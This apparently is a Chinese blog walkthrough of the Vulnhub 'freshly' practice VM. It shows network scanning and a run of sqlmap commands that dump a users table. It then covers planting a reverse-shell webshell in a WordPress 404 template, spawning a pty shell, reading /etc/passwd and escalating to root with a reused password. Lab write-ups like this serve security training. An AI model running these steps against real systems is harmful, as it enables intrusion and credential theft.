Vulnhub靶机第六关

Vulnhub靶机 freshly
运行环境
Virtualbox
VM(运行会提示错误,给的解决链接已经404)
本靶机推荐使用Virtualbox搭建
说明
此靶机的目标是通过网络渗透进主机,并找到隐藏在敏感文件中的秘密。
运行环境
将下载的OVA文件导入进Virtualbox即可。
将虚拟机用virtualbox打开后设置为桥接网卡
Vulnhub靶机第六关_第1张图片
查看本机网卡找到对应的ip段使用nmap 扫描
命令:ipconfig /all|more
Nmap -sT 192.168.1.0/24
Vulnhub靶机第六关_第2张图片
切换网络时ip会改变
访问主页
Vulnhub靶机第六关_第3张图片
使用御剑扫描目录
Vulnhub靶机第六关_第4张图片
发现登录页
Vulnhub靶机第六关_第5张图片
使用sqlmap扫描
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 查看是否存在注入点
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 --dbs 查看数据库
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” --tables 查看数据表
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” -T “users” --columns 查看字段
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” -T “users” -C “username,password” --dump 查看字段内容
得到账户密码:admin SuperSecretPassword
Vulnhub靶机第六关_第6张图片
登录后台
http://192.168.1.54:8080/wordpress/wp-login.php
在404模板写入反弹shell 的大马
Vulnhub靶机第六关_第7张图片
开启nc监听
在这里插入图片描述
访问404.php
Vulnhub靶机第六关_第8张图片
拿到shell
Vulnhub靶机第六关_第9张图片
输入:python -c 'import pty;pty.spawn("/bin/bash")'得到一个交互式的shell
在这里插入图片描述
输入 cat /etc/passwd
Vulnhub靶机第六关_第10张图片
输入su 尝试切换到root用户,尝试输入注入得到的密码:SuperSecretPassword 成功切换
Vulnhub靶机第六关_第11张图片
但是根目录下都是乱码
输入: ls -lh --color=never 乱码恢复正常
Vulnhub靶机第六关_第12张图片
提权成功

你可能感兴趣的:(Vulnhub靶机第六关,安全)